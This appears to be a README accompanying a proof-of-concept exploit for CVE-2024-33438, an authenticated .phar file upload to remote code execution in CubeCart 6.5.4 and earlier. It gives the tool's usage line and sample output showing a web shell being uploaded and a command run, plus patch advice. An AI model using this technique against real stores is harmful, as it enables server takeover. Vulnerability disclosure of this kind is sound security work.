# Arbitrary File Upload Leads to RCE (CVE-2024-33438)
CubeCart <= 6.5.4 is vulnerable to an arbitrary file upload issue that leads to remote code execution (RCE). The vulnerability affects the application's file manager and its filters by allowing attackers to upload `.phar` files containing malicious code. CubeCart should be updated to 6.5.5 as it implements a security patch to fix this vulnerability.

For more details, please see the official announcement by CubeCart in the references.

## Exploit
An automated proof-of-concept (PoC) has been created, but this vulnerability can also be exploited manually by uploading a malicious `.phar` file via the file manager.

This is the usage of the PoC:
Usage: python3 <URL> <username> <password> <command>

After running it, this is the expected output for a successful exploitation:
python3 http://localhost/admin_0Kqnr9.php admin 123456 whoami

     []  ,----.___
   __||_/___      '.
  / O||    /|
 /   ""   / /
/________/ /   launching exploit
|________|/    please wait...

[+] Trying to log into the application...
[+] Successful login. Uploading a simple web shell to the server...
[+] Executing command...

Output: www-data

## References